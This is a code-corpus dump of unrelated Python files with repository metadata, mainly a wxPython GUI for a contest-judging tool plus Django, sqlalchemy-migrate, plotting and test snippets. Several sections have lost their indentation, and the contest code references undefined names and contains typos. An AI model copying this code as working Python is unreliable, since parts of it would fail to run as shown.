cp_name = self.CompetitorListBox.GetString(index)
if self.CompetitorListBox.IsChecked(index):
self.con.AddCompetitor(cp_name)
else:
self.con.RemoveCompetitor(cp_name)
EmitUpdateDisplay(self,"Judge",self.con)
event.Skip()
class rpcontest_RunJudgePanel(wx.Panel):
    """Progress view for a running judgement: gauge, LED timer, log window
    and start/stop buttons.

    The judge runs on a worker thread (see OnStartJudge), so every UI update
    coming from it is marshalled onto the GUI thread with wx.CallAfter.
    """
    def __init__(self,parent):
        wx.Panel.__init__(self,parent,-1)
        self.sizer = wx.BoxSizer(wx.VERTICAL)
        self.ProcessGauge = rpcontest_Gauge(self)
        self.sizer.Add(CreateLabelItem(self,"Process",self.ProcessGauge),0,wx.EXPAND)
        # LED display shows "current-total" elapsed seconds.
        self.TimerLED = wx.gizmos.LEDNumberCtrl(self,-1)
        self.TimerLED.SetValue("0.000-0.000")
        self.sizer.Add(CreateLabelItem(self,"Timer",self.TimerLED),1,wx.EXPAND)
        self.Timer_Total = 0.0
        self.Timer_Current = 0.0
        self.ProcessTextCtrl = wx.TextCtrl(self,-1,style=wx.TE_READONLY | wx.TE_MULTILINE)
        Font = wx.Font(10,wx.MODERN,wx.NORMAL,weight=10)
        self.ProcessTextCtrl.SetFont(Font)
        self.sizer.Add(self.ProcessTextCtrl,3,wx.EXPAND)
        self.sizer.Add(self.CreateButton(),0,wx.EXPAND)
        self.SetSizer(self.sizer)
        # Judge options, toggled from the Frame's menu via the parent panel.
        self.flag_OmitJudged = False
        self.flag_FastJudge = False
        self.Bind(wx.EVT_BUTTON,self.OnStopJudge,self.StopJudgeButton)
        self.Bind(wx.EVT_BUTTON,self.OnStartJudge,self.StartJudgeButton)
    def CreateButton(self):
        hsizer = wx.BoxSizer()
        self.StartJudgeButton = wx.Button(self,-1,label="Start Judge")
        hsizer.Add(self.StartJudgeButton,0,wx.RIGHT)
        self.StopJudgeButton = wx.Button(self,-1,label="Stop Judge")
        hsizer.Add(self.StopJudgeButton,0,wx.RIGHT)
        # Stop is only meaningful while a judgement is running.
        self.StopJudgeButton.Disable()
        return hsizer
    def UpdateTimer(self,Current,Total):
        # Called from the judge thread; hop to the GUI thread before touching
        # the control.
        def _UpdateTimer(self,Current,Total):
            self.TimerLED.SetValue("%.3f-%.3f  " % (Current,Total))
        wx.CallAfter(_UpdateTimer,self,Current,Total)
    def UpdateProcess(self,Current,Total):
        # Thread-safe progress-gauge update (same CallAfter pattern).
        def _UpdateProcess(self,Current,Total):
            self.ProcessGauge.SetTotal(Total)
            self.ProcessGauge.SetCurrent(Current)
        wx.CallAfter(_UpdateProcess,self,Current,Total)
    def EndJudge(self):
        # Thread-safe end-of-run handling: fill the gauge, restore buttons.
        def _EndJudge(self):
            self.ProcessGauge.SetCurrent(self.ProcessGauge.Total)
            self.StartJudgeButton.Enable()
            self.StopJudgeButton.Disable()
        wx.CallAfter(_EndJudge,self)
    def AddJudgeInfo(self,Text):
        # Thread-safe append to the judgement log.
        def _AddJudgeInfo(self,Text):
            self.ProcessTextCtrl.AppendText(Text)
        wx.CallAfter(_AddJudgeInfo,self,Text)
    def OnStartJudge(self,event):
        # Parent is rpcontest_JudgePanel: it owns the contest and the two
        # check lists of what to judge.
        self.con = self.GetParent().con
        competitors = self.GetParent().Competitors.GetCheckedItems()
        tasks = self.GetParent().Tasks.GetCheckedItems()
        if len(competitors) == 0 or len(tasks) == 0:
            return
        self.ProcessTextCtrl.Clear()
        # Run the (long) judgement off the GUI thread (Py2 `thread` module).
        self.td = thread.start_new_thread(
            self.con.Judge,
            (tasks,competitors,self.flag_OmitJudged,self.flag_FastJudge)
        )
        self.StartJudgeButton.Disable()
        self.StopJudgeButton.Enable()
        event.Skip()
    def OnStopJudge(self,event):
        wx.CallAfter(self.con.AbortJudge)
        self.StartJudgeButton.Enable()
        self.StopJudgeButton.Disable()
        self.ProcessGauge.Reset()
        event.Skip()
class rpcontest_JudgePanel(wx.Panel):
    """Notebook page for running judgements: pick competitors and tasks on
    the left, watch/control the run on the right (rpcontest_RunJudgePanel).
    """
    def __init__(self,parent,con):
        wx.Panel.__init__(self,parent,id = -1)
        self.con = con
        self.sizer = wx.BoxSizer()
        self.sizer.Add(self.CreateJudgeInfoBox(),0,wx.EXPAND)
        self.sizer.Add(self.CreateJudgeProcessBox(),1,wx.EXPAND)
        self.SetSizer(self.sizer)
    def CreateJudgeInfoBox(self):
        # Two check lists: which competitors and which tasks to judge.
        sizer = wx.BoxSizer(wx.HORIZONTAL)
        self.Competitors = rpcontest_CheckList(self)
        sizer.Add(CreateLabelItem(self,"Choose Competitors:",self.Competitors),1,wx.EXPAND)
        self.Tasks = rpcontest_CheckList(self)
        sizer.Add(CreateLabelItem(self,"Choose Tasks:",self.Tasks),1,wx.EXPAND)
        return CreateLabelItem(self,"Judgement Information",sizer)
    def UpdateDisplay(self,con):
        # Repopulate both check lists from `con`; a None contest blanks them.
        self.con = con
        self.Competitors.ClearAll()
        self.Tasks.ClearAll()
        if not self.con: return
        for tk in self.con.GetTaskList():
            self.Tasks.Append(tk.GetTaskName())
        for cp in self.con.GetCompetitorList():
            self.Competitors.Append(cp.GetName())
    def CreateJudgeProcessBox(self):
        sizer = wx.BoxSizer(wx.VERTICAL)
        self.JudgePanel = rpcontest_RunJudgePanel(self)
        sizer.Add(self.JudgePanel,1,wx.EXPAND)
        return CreateLabelItem(self,"Judgement Process",sizer)
    def SetFlag_OmitJudged(self,Flag):
        # Forward the "omit already-judged" menu option to the run panel.
        self.JudgePanel.flag_OmitJudged = Flag
    def SetFlag_FastJudge(self,Flag):
        # Forward the "don't wait after judgement" menu option.
        self.JudgePanel.flag_FastJudge = Flag
class rpcontest_WorkPanel(wx.Panel):
    """Main work area of the frame: a notebook with the Config and Judge
    pages, both sharing the frame's contest object."""
    def __init__(self,parent,frame):
        # Tab captions are centred in a fixed width so both tabs look equal.
        self.TabWidth = 50
        wx.Panel.__init__(self,parent,-1,style=wx.SUNKEN_BORDER)
        self.Frame = frame
        self.nb = wx.Notebook(self)
        self.config_window = rpcontest_ConfigurePanel(self.nb,self.Frame.con)
        self.nb.AddPage(self.config_window,"Config".center(self.TabWidth))
        self.judge_window = rpcontest_JudgePanel(self.nb,self.Frame.con)
        self.nb.AddPage(self.judge_window,"Judge".center(self.TabWidth))
        self.sizer = wx.BoxSizer()
        self.sizer.Add(self.nb,1,flag=wx.EXPAND)
        self.SetSizer(self.sizer)
    def UpdateDisplay(self,con):
        # Push the (possibly new/None) contest into both notebook pages.
        self.config_window.UpdateDisplay(con)
        self.judge_window.UpdateDisplay(con)
class rpcontest_Frame(wx.Frame):
def __init__(self):
self._Title = "%s %s" % (app_name,version)
wx.Frame.__init__(
self,
parent=None,
id=-1,
title=self._Title,
size=(1200,800)
)
self.Center()
self._icon = wx.Icon(rpc.IPTH + r"/icon.png",wx.BITMAP_TYPE_PNG)
self.SetIcon(self._icon)
self.con = None
self.CreateMenuBar()
self.CreateWorkSpace()
self.statusbar = self.CreateStatusBar()
self.SetStatus()
self.Bind(EVT_ADD_RUNTIME_INFO,self.OnAddRuntimeInfo)
self.Bind(EVT_UPDATE_DISPLAY,self.OnUpdateDisplay)
self.flag_MergeExport = False
self.flag_ForceExport = False
self.CreateOutputHandle()
def OnAddRuntimeInfo(self,event):
self.AddRuntimeInfo(event.GetText())
def OnUpdateDisplay(self,event):
t,con = event.Get()
if t == "All":
self.workwindow.UpdateDisplay(con)
elif t == "Config":
self.workwindow.config_window.UpdateDisplay(con)
elif t == "Judge":
self.workwindow.judge_window.UpdateDisplay(con)
def AddRuntimeInfo(self,info):
max_line_lenth = 512
self.infowindow.AppendText(info)
while self.infowindow.GetNumberOfLines() > max_line_lenth:
self.infowindow.Remove(0,1)
def CreateMenuBar(self):
MenuData = \
(
("&Contest",
("&Open Contest\tCtrl-O" ,"Open an existed contest",self.OnOpenContest),
("&New Contest\tCtrl-N" ,"Create a new contest",self.OnCreateContest),
("&Save Contest\tCtrl-S" ,"Save Current contest",self.OnSaveContest),
(None,None,None),
("&Quit\tCtrl-Q" ,"Quit rpcontest",self.OnQuit)
),
("C&ontrol",
("&Refresh\tF5" , "Refresh the display",self.OnRefresh),
("&Reload\tCtrl-F5" , "Reload the contest",self.OnReload)
),
("&Judge",
("Judge Options" , "Config Your Judgement",
(
("Don't wait after judgement","#CheckItem",self.OnCheckFastJudge),
("Omit judged competitors and tasks","#CheckItem",self.OnCheckOmitJudged)
)
),
("Export Options", "Config Your Export Style",
(
("Force Export","#CheckItem",self.OnCheckForceExport),
("Export as a html file","#CheckItem",self.OnCheckMergeExport),
)
),
("Clear Results" ,"Note : Will Auto Reload the Contest",self.OnClearResult),
("Export Html\tCtrl-E" , "Export As a HTML File",self.OnExportHtml),
("Open Report File\tCtrl-Alt-E", "Open Report File",self.OnOpenReport)
),
("&InfoWindow",
("On" , "#RadioItem" , self.TurnOnInfoWindow),
("Off", "#RadioItem" , self.TurnOffInfoWindow)
),
("&Help",
("&Help Document\tF1","Help Document",self.OnHelp),
("&About","About",self.OnAbout)
),
)
def CreateMenu(menudata):
menu = wx.Menu()
for label,status,handler in menudata:
if label == None:
menu.AppendSeparator()
else:
if type(handler) == tuple:
menu.AppendMenu(-1,label,CreateMenu(handler),status)
elif status[0] == '#':
if status == '#CheckItem':
cmenu = menu.AppendCheckItem(-1,label,status)
self.Bind(wx.EVT_MENU,handler,cmenu)
elif status == "#RadioItem":
cmenu = menu.AppendRadioItem(-1,label,status)
self.Bind(wx.EVT_MENU,handler,cmenu)
else:
cmenu = menu.Append(-1,label,status)
self.Bind(wx.EVT_MENU,handler,cmenu)
return menu
self.menubar = wx.MenuBar()
self.Menus = []
for md in MenuData:
ml,md = md[0],md[1:]
self.Menus.append(CreateMenu(md))
self.menubar.Append(self.Menus[-1],ml)
self.SetMenuBar(self.menubar)
def CreateWorkSpace(self):
def CreateWorkWindow():
self.workwindow = rpcontest_WorkPanel(self,self)
self.sizer.Add(self.workwindow,proportion=2,flag = wx.EXPAND)
def CreateInfoWindow():
self.infowindow = wx.TextCtrl(
parent = self,
id = -1,
style=wx.SUNKEN_BORDER | wx.TE_MULTILINE | wx.TE_READONLY
)
self.infowindow.SetBackgroundColour("pink")
Font = wx.Font(11,wx.MODERN,style=wx.NORMAL,weight=11)
self.infowindow.SetFont(Font)
self.__total_infowindow = CreateLabelItem(self,"Runtime Information:",self.infowindow)
self.sizer.Add(self.__total_infowindow,
proportion=1,flag = wx.EXPAND)
self.sizer = wx.BoxSizer(wx.VERTICAL)
CreateWorkWindow()
CreateInfoWindow()
self.SetSizer(self.sizer)
def SetStatus(self):
if self.con:
self.statusbar.SetStatusText("Contest : %s" % self.con.GetTitle())
self.SetTitle(self._Title + " -- %s" % self.con.GetTitle())
else:
self.SetTitle(self._Title)
self.statusbar.SetStatusText("Free")
def OnOpenReport(self,event):
if not self.con : return
report_file = self.con.GetPath() + r'/' + rpc.PATH_D_RESULT + r"/" + rpc.PATH_F_EXRESULT
if not os.path.isfile(report_file):
PError(self,"No report file!")
return
import webbrowser
webbrowser.open("file://"+report_file)
def OnExportHtml(self,event):
if self.con == None: return
try:
self.AddRuntimeInfo("Export report html for Contest - %s\n" % self.con.GetTitle())
self.con.Export(
flag_ForceExport = self.flag_ForceExport,
flag_Merge = self.flag_MergeExport
)
except rpc.RpException,x:
PError(self,x.FormatErrorText())
def OnCheckFastJudge(self,event):
self.workwindow.judge_window.SetFlag_FastJudge(
self.menubar.IsChecked(event.GetId())
)
event.Skip()
def OnCheckOmitJudged(self,event):
self.workwindow.judge_window.SetFlag_OmitJudged(
self.menubar.IsChecked(event.GetId())
)
event.Skip()
def OnCheckForceExport(self,event):
self.flag_ForceExport = self.menubar.IsChecked(event.GetId())
event.Skip()
def OnCheckMergeExport(self,event):
self.flag_MergeExport = self.menubar.IsChecked(event.GetId())
event.Skip()
def TurnOffInfoWindow(self,event):
self.__total_infowindow.Hide(self.infowindow)
event.Skip()
def TurnOnInfoWindow(self,event):
self.__total_infowindow.Show(self.infowindow)
event.Skip()
def OnClearResult(self,event):
if not self.con: return
shutil.rmtree(self.con.GetPath() + r'/' + rpc.PATH_D_RESULT)
self.OnReload(event)
event.Skip()
def OnOpenContest(self,event):
chdialog = wx.FileDialog(
parent=self,
message="Choose A Contest",
defaultDir="~",
wildcard="RPC-ContestFile|*.rpc",
style=wx.OPEN
)
if chdialog.ShowModal() == wx.ID_OK:
filename = chdialog.GetPath()
try:
self.AddRuntimeInfo("Open Contest at : %s\n" % filename)
self.con = rpc.Contest(os.path.dirname(filename),self.OutputHandle)
self.con.LoadrpcFile(os.path.basename(filename))
except rpc.RpException,x:
self.con = None
PError(self,x.FormatErrorText())
self.workwindow.UpdateDisplay(self.con)
self.SetStatus()
chdialog.Destroy()
event.Skip()
def OnQuit(self,event):
if self.con:
self.con.AbortJudge()
self.AddRuntimeInfo("Quit\n")
self.Close()
def OnSaveContest(self,event):
if not self.con:
self.AddRuntimeInfo("No thing to save!\n")
return
self.AddRuntimeInfo("Saving contest ...")
self.con.SaveContest()
self.AddRuntimeInfo("Done\n")
def OnRefresh(self,event):
if not self.con: return
self.SetStatus()
self.workwindow.UpdateDisplay(self.con)
event.Skip()
def OnReload(self,event):
if not self.con: return
self.con.Reload()
self.SetStatus()
self.workwindow.UpdateDisplay(self.con)
event.Skip()
def OnCreateContest(self,event):
chdialog = wx.DirDialog(
parent = self,
message="Choose A Contest Menu",
defaultPath="~"
)
if chdialog.ShowModal() == wx.ID_OK:
self.CreateNewContest(chdialog.GetPath())
self.workwindow.UpdateDisplay(self.con)
self.SetStatus()
chdialog.Destroy()
event.Skip()
def OnAbout(self,event):
info = wx.AboutDialogInfo()
info.Name = app_name
info.SetIcon(self._icon)
info.SetVersion(version)
info.SetCopyright('(C) RapidHere RanttuInc@BunkerHill')
info.AddDeveloper("[email protected]")
info.SetDescription(
"grpcontest:\n"
"grpcontest is the GUI-Frame for rpcontest\n"
"Based on rpcontest kernel %s\n" % rpc.version +
"\n"
"rpcontest:" +
rpc.Description
)
wx.AboutBox(info)
def CreateNewContest(self,path):
path = os.path.abspath(path)
if not os.path.isdir(path + r'/' + D_SRC):
os.makedirs(path + r'/' + rpc.PATH_D_SRC)
if not os.path.isdir(path + r'/' + D_DATA):
os.makedirs(path + r'/' + rpc.PATH_D_DATA)
fp = open(path + r'/' + "auto_create.rpc","w")
fp.write(rpc.RPC_KEY_TITLE + " sample")
fp.write(rpc.RPC_KEY_TASK + "\n" + rpc.RPC_KEY_COMPETITOR + "\n")
fp.close()
for mn in os.listdir(path + r'/' + rpc.PATH_D_DATA):
if os.path.isdir(path + r'/' + rpc.PATH_D_DATA + r'/' + mn) and \
not os.path.isfile(path + r'/' + mn + '.' + rpc.EXT_TYPE_RTC):
fp = open(path + r'/' + mn + '.' + rpc.EXT_TYPR_RTC,"w")
fp.close()
try:
self.AddRuntimeInfo("Create New contest at : %s\n" % path)
self.con = rpc.Contest(path,self.OutputHandle)
self.con.LoadrpcFile("auto_create.rpc")
except RpError,x:
self.con = None
PError(self,x.txt)
def OnHelp(self,event):
self.AddRuntimeInfo("Sorry ... But the help document is empty = =\n")
def CreateOutputHandle(self):
class OutputHandle(rpc.baseOutputHandle):
def __init__(self,Frame):
rpc.baseOutputHandle.__init__(self)
self.Frame = Frame
def PrintWarningInfo(self,Text):
self.Frame.AddRuntimeInfo("Warning : " + Text)
def PrintErrorInfo(self,Text):
PError(self.Frame,Text)
def PrintRuntimeInfo(self,Text):
self.Frame.AddRuntimeInfo(Text + "\n")
def PrintJudgeInfo(self,Indent,Text):
self.Frame.workwindow.judge_window.JudgePanel.AddJudgeInfo(
" " * Indent + Text
)
def Timer(self,Current,Total):
self.Frame.workwindow.judge_window.JudgePanel.UpdateTimer(Current,Total)
def Process(self,Current,Total):
self.Frame.workwindow.judge_window.JudgePanel.UpdateProcess(Current,Total)
def EndJudge(self):
self.Frame.AddRuntimeInfo("="*80 + "Judge Done\n")
self.Frame.workwindow.judge_window.JudgePanel.EndJudge()
self.OutputHandle = OutputHandle(self)
class App(wx.App):
    def OnInit(self):
        # Show a timed splash screen, then let the caller build the frame.
        waittime = 3000  # splash display time in milliseconds
        bmp = wx.Image(rpc.IPTH + "/boot.png").ConvertToBitmap()
        wx.SplashScreen(
            bitmap = bmp,
            splashStyle = wx.SPLASH_TIMEOUT | wx.SPLASH_CENTRE_ON_SCREEN,
            milliseconds = waittime,
            parent=None,
            id=-1
        )
        wx.Yield()  # give the splash a chance to paint before start-up work
        self.SetAppName(app_name)
        return True
def Start():
    """Create the wx application and main frame, then enter the event loop."""
    application = App()
    main_window = rpcontest_Frame()
    main_window.Show()
    application.MainLoop()
# Launch the GUI when executed directly as a script.
if __name__ == "__main__":
    Start()
|
[
"[email protected]"
] | |
86b41f04464f6255cf2d2a8cd880398100d011ba
|
0f7d51a3253a958e8f0c9dbab3f1afe1fbfeca1e
|
/db_repository/versions/025_migration.py
|
219650371a39505472b3fad4345d5dd985aa80a0
|
[] |
no_license
|
Baakel/KastelEditor
|
d71f7ec69341f629d2be89a2cd374a132677bb47
|
d6af90fbc666877c866fcdfe5877ae730d3cd99c
|
refs/heads/master
| 2023-05-26T02:37:21.234627 | 2020-10-30T17:40:17 | 2020-10-30T17:40:17 | 114,881,347 | 0 | 0 | null | 2023-05-22T23:19:55 | 2017-12-20T11:49:30 |
Python
|
UTF-8
|
Python
| false | false | 1,049 |
py
|
from sqlalchemy import *
from migrate import *
from migrate.changeset import schema
# Schemas describing the database before (pre) and after (post) this
# sqlalchemy-migrate migration.
pre_meta = MetaData()
post_meta = MetaData()
# Table introduced by this migration: boolean flags per hard-goal record.
hard_goal_storage = Table('hard_goal_storage', post_meta,
    Column('id', Integer, primary_key=True, nullable=False),
    Column('authenticity', Boolean, default=ColumnDefault(False)),
    Column('confidentiality', Boolean, default=ColumnDefault(False)),
    Column('integrity', Boolean, default=ColumnDefault(False)),
    Column('application', Boolean, default=ColumnDefault(False)),
    Column('service', Boolean, default=ColumnDefault(False)),
)
def upgrade(migrate_engine):
    """Apply the migration: create the hard_goal_storage table."""
    # Upgrade operations go here. Don't create your own engine; bind
    # migrate_engine to your metadata
    pre_meta.bind = migrate_engine
    post_meta.bind = migrate_engine
    post_meta.tables['hard_goal_storage'].create()
def downgrade(migrate_engine):
    """Revert the migration: drop the hard_goal_storage table."""
    # Operations to reverse the above upgrade go here.
    pre_meta.bind = migrate_engine
    post_meta.bind = migrate_engine
    post_meta.tables['hard_goal_storage'].drop()
|
[
"[email protected]"
] | |
6706701293cdbce507bac30e11f9f774657847a1
|
3bc910f6f2537e8da5756ec0bc09f8bdf8e20957
|
/status/management/commands/rlm_beat.py
|
9b28d729a43851b3e3b49aa8fad449d4298cc23f
|
[] |
no_license
|
harry-bridge/vectorworks-status
|
179bebb77246166a61e0f71e9d45b04e0d04f909
|
8900e6abc7283a21dec8f8f79731db8dc172c328
|
refs/heads/main
| 2023-05-31T04:29:01.021017 | 2021-06-22T08:54:55 | 2021-06-22T08:54:55 | 375,836,154 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
from django.core.management.base import BaseCommand, CommandError
from django.core import exceptions
from django.conf import settings
from status.rlm_scraper import RLMScrape
class Command(BaseCommand):
    help = "Runs the RLM beat task from rlm scraper, this task is usually ran via a cron job"
    def handle(self, *args, **options):
        """Entry point for `manage.py rlm_beat`: run one scraper beat cycle."""
        RLMScrape().beat_task()
|
[
"[email protected]"
] | |
6068e0dfbaa8b3e02df630a1f8f2d8551b444403
|
2eaecdb1ed42170463993b8b2285296c5ef2231d
|
/apps/ciudad/admin.py
|
d7e080b95887458bf100d3a8e00e6edfdc8c6041
|
[] |
no_license
|
ivanfdaza/tribunaleclesiasticoIIS
|
9639fc66a2c99baa45b8276f4a1e035bdf294e2e
|
acb164ab8464b71d0461acf03bdd5e3386b57893
|
refs/heads/master
| 2022-11-21T10:32:14.925326 | 2020-07-23T16:21:26 | 2020-07-23T16:21:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 177 |
py
|
from django.contrib import admin
# Register your models here.
from apps.ciudad.models import Ciudad, Departamento
# Expose both location models in the Django admin with default options.
admin.site.register(Ciudad)
admin.site.register(Departamento)
|
[
"[email protected]"
] | |
550f47bd84b8cb4db7e6a30a771dc7247e09d969
|
1be1433af91877966ec17343571252be3807d115
|
/plotters/spars-time-error.py
|
a93bf2f567a2fe21a2f9bc27e92bec44bf0ffd87
|
[] |
no_license
|
beginner1010/script-triangle
|
e298c50db2b5cc476ffe66865417a61b6de135a1
|
88b83980afe7d1d23b76120d17f991282ea29bad
|
refs/heads/master
| 2023-08-22T21:24:35.187888 | 2021-09-26T05:35:27 | 2021-09-26T05:35:27 | 406,838,359 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,068 |
py
|
from settings import *
def exp_range(start, stop, step):
    """Yield a geometric progression: start, start*step, ... while < stop."""
    current = start
    while current < stop:
        yield current
        current *= step
# Plot sparsification error vs. sampling probability for each graph:
# one curve for colourful sparsification (clr) and one for edge
# sparsification (edg), both on a log-scaled error axis.
folder_path = '../output'
output_folder_path = '../plots'
graph_names = ['Journal']
colors = ['teal', 'purple']  # clr curve, edg curve
alpha= 0.6
width = 1 # size of bars in the plot
lw = 12  # line width of the curves
for gname in graph_names:
    input_file = folder_path + '/' + gname
    # Result files are space-separated triples: runtime, probability, error.
    df_clr = pd.read_csv(input_file + '/' + 'clr-7iter.txt', sep=' ',skipinitialspace=True, names=['time', 'prob', 'error'])
    df_edg = pd.read_csv(input_file + '/' + 'edgspars-7iter.txt', sep=' ',skipinitialspace=True, names=['time', 'prob', 'error'])
    #df_clr = df_clr[3:]
    print(df_clr.head(20), df_edg.head(20))
    fig, ax = plt.subplots(figsize=(8, 5))
    ax.plot(df_clr['prob'], df_clr['error'], alpha=alpha, color=colors[0], linewidth=lw, marker='o', markersize = 22, markevery=4, linestyle=':', markerfacecolor='deeppink', markeredgecolor='k', solid_capstyle='round', dash_capstyle='round')
    ax.plot(df_edg['prob'], df_edg['error'], alpha=alpha, color=colors[1], linewidth=lw, marker='o', markersize = 22, markevery=4, linestyle=':', markerfacecolor='deeppink', markeredgecolor='k', solid_capstyle='round', dash_capstyle='round')
    ax.margins(x=0)
    #plt.ylim([0.2, 101])
    ax.set_ylabel(r'Error(\%)')
    ax.set_xlabel('Probability $p$')
    ax.set_yticks([0.01, 1.0, 10.0, 100.0])
    ax.set_xticks([0.004, 0.016, 0.062, 0.25, 1.0])
    # NOTE(review): `basey`/`basex` were renamed `base` in matplotlib 3.3+.
    plt.yscale('log', basey=10)
    #plt.xscale('log', basex=4)
    ax.xaxis.set_major_formatter(FormatStrFormatter('%g'))
    ax.yaxis.set_major_formatter(FormatStrFormatter('%d'))
    # output_path = output_folder_path + '/' + gname + '/'
    # if not os.path.exists(output_path):
    #     os.makedirs(output_path)
    #ax.figure.savefig(output_path + '/' + gname + '-spars-error-time.pdf', format='pdf',
    #                  bbox_inches='tight', dpi=400)
    plt.show()
    time.sleep(1)
    plt.close("all")
|
[
"[email protected]"
] | |
d1dc906d5d4c502b2a273b95d457c4b8d5bbb228
|
dd100eb3fb4302d0269bc20e351fb8b668fe2f0b
|
/PyBank/main.py
|
07f7051db289cc12fa04a8ab291f911e2cc6a13b
|
[] |
no_license
|
emieeb/python-challenge
|
1f1f7ad4017860edc9e0225dc54a81207b37698a
|
4913c9c1378245e7155d7e6bac3f6a81a1e760e8
|
refs/heads/master
| 2020-04-03T01:03:17.822701 | 2018-10-27T06:31:35 | 2018-10-27T06:31:35 | 154,917,888 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 518 |
py
|
# Module for reading CSV files
import os
import csv

# Set path for file
pybank_csv = os.path.join("..", "Resources", "budget_data.csv")


def analyze_budget(rows):
    """Summarise a budget table.

    rows: ordered list of (date, amount) pairs with amount already an int.
    Returns a dict with:
      total_months     -- number of rows
      net_total        -- sum of all amounts
      average_change   -- mean month-over-month delta (0.0 if < 2 rows)
      greatest_increase / greatest_decrease -- (date, delta) pairs for the
        largest positive / negative monthly change ((None, 0) if < 2 rows)
    """
    total_months = len(rows)
    net_total = sum(amount for _, amount in rows)
    # Month-over-month deltas, keyed by the month the change landed in.
    deltas = [(rows[i][0], rows[i][1] - rows[i - 1][1])
              for i in range(1, total_months)]
    if deltas:
        average_change = sum(change for _, change in deltas) / len(deltas)
        greatest_increase = max(deltas, key=lambda pair: pair[1])
        greatest_decrease = min(deltas, key=lambda pair: pair[1])
    else:
        average_change = 0.0
        greatest_increase = (None, 0)
        greatest_decrease = (None, 0)
    return {
        "total_months": total_months,
        "net_total": net_total,
        "average_change": average_change,
        "greatest_increase": greatest_increase,
        "greatest_decrease": greatest_decrease,
    }


def main():
    """Read the budget CSV and print the financial analysis."""
    with open(pybank_csv, newline="") as handle:
        reader = csv.reader(handle)
        next(reader)  # skip the header row
        rows = [(date, int(amount)) for date, amount in reader]
    stats = analyze_budget(rows)
    print("Financial Analysis")
    print("----------------------------")
    print("Total Months: {}".format(stats["total_months"]))
    print("Total: ${}".format(stats["net_total"]))
    print("Average  Change: ${:.2f}".format(stats["average_change"]))
    print("Greatest Increase in Profits: {} (${})".format(*stats["greatest_increase"]))
    print("Greatest Decrease in Profits: {} (${})".format(*stats["greatest_decrease"]))


if __name__ == "__main__":
    main()
|
[
"[email protected]"
] | |
f67f8da1dbcd1d8e7b3087e0c2f1e56c14757ab9
|
6fc350b28a535e23c6bdbb079dfec8fe405bfbc7
|
/test_label_speed.py
|
0bb0c15a5749413196d2a0fd9d4bdcb1b311bdca
|
[] |
no_license
|
dieuwkehupkes/Thesis
|
ab43ae4382fdbaae6f95f05cbf06b9c38861e86d
|
6702f65aa2249285824aa5102ae24a0508e0bce2
|
refs/heads/master
| 2016-09-05T21:08:09.736730 | 2013-11-28T08:11:27 | 2013-11-28T08:11:27 | 10,358,841 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 603 |
py
|
from labelling import *
from file_processing import *
import sys
import time
alignments =sys.argv[1]
sentences = sys.argv[2]
dependencies = sys.argv[3]
f = ProcessDependencies(alignments, sentences, dependencies)
new = f.next()
total = 0
while new:
sentence = new[1].split()
if len(sentence) < 40:
dependencies = Dependencies(new[2],new[1])
l = Labels(dependencies.dependency_labels())
t1 = time.time()
labels = l.label_most
t2 = time.time()
labelling_time = t2-t1
print 'labelling time:', labelling_time
total += labelling_time
new = f.next()
print 'total labelling time:', total
|
[
"[email protected]"
] | |
8b7e8df6bfc87e759bc5f3ade6411eea745c6f08
|
6ada628cc386b6aed52c0f25ca27c459f4c70e5d
|
/src/unittest/python/picasadb_tests.py
|
dd022929a94b9f8e17fc349bf415621de8ea9c22
|
[] |
no_license
|
arnehilmann/photolib
|
dca92d6382395673214d042481e57e79a2e5d88a
|
0712b631eaeedcd3dd71e6c84beacaeb24bd88a5
|
refs/heads/master
| 2021-01-22T11:55:17.203982 | 2016-10-04T13:21:16 | 2016-10-04T13:21:16 | 15,698,842 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,801 |
py
|
import unittest
from mock import patch, mock_open
from photolib.picasadb import PicasaDb
class PicasaDbTest(unittest.TestCase):
    """Unit tests for photolib.picasadb.PicasaDb using mocked file access."""
    def test_find_contacts_file(self):
        # Point the home-directory lookup at the test resources and check the
        # contacts file is parsed into the id -> person mapping.
        with patch("os.path.expanduser", return_value="src/resources"):
            pdb = PicasaDb(["src/resources/testsamples"])
            self.assertEqual(pdb.id2person["d920"], "foo")
    def test_build_db(self):
        # Building the database over the sample directory must not raise.
        with patch("photolib.picasadb.PicasaDb._find_contacts_file",
                   return_value="src/resources/testsamples/contacts.xml"):
            pdb = PicasaDb(["src/resources/testsamples"])
            pdb.build_db()
    def test_store_and_read_database(self):
        # Verify store_db/import_db open the expected path for write/read;
        # mock_open keeps the bogus filename from touching the filesystem.
        with patch("photolib.picasadb.PicasaDb._find_contacts_file",
                   return_value="src/resources/testsamples/contacts.xml"):
            pdb = PicasaDb(["src/resources/testsamples"])
            pdb.build_db()
            m = mock_open()
            with patch("__builtin__.open", m, create=True):
                pdb.store_db("/...invalid.filename...")
            m.assert_called_once_with("/...invalid.filename...", "w")
            m = mock_open()
            with patch("__builtin__.open", m, create=True):
                pdb.import_db("/...invalid.filename...")
            m.assert_called_once_with("/...invalid.filename...")
    def test_analyze_faces_string(self):
        # The first face in the string should decode to name "foo" with the
        # expected normalised rectangle.
        with patch("photolib.picasadb.PicasaDb._find_contacts_file",
                   return_value="src/resources/testsamples/contacts.xml"):
            pdb = PicasaDb(["src/resources/testsamples"])
            for face in pdb.analyze_faces_string("rect64(000800000008000),foo;rect64(67890),bar"):
                self.assertEqual(("foo", [0, 0.5, 0.0, 0.5]), face)
                break
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
5e65abbff3ad4964ee18fe22613c1cd4d21515d3
|
e6ff4e3cf5c3959b168e19bf069bbdd6b2e49fcb
|
/CORE/fSandController.py
|
37f5f78e66dbb7d80d0ea16cb8cfa3cec38c30e4
|
[] |
no_license
|
spaceuniverse/QLSD
|
0b14a4e323457b9e1a4e8bd75f0afd486687b351
|
2953623d331cb5d4567a2b01bece9a0aba482166
|
refs/heads/master
| 2016-08-08T15:05:51.170426 | 2015-05-08T21:14:26 | 2015-05-08T21:14:26 | 22,347,324 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,831 |
py
|
# ---------------------------------------------------------------------# IMPORTS
import numpy as np
from fSandFun import *
# ---------------------------------------------------------------------# MAIN
class Controll(object):
    """Linear Q-function controller: Q(s, a) = W[:, a] . features(s).

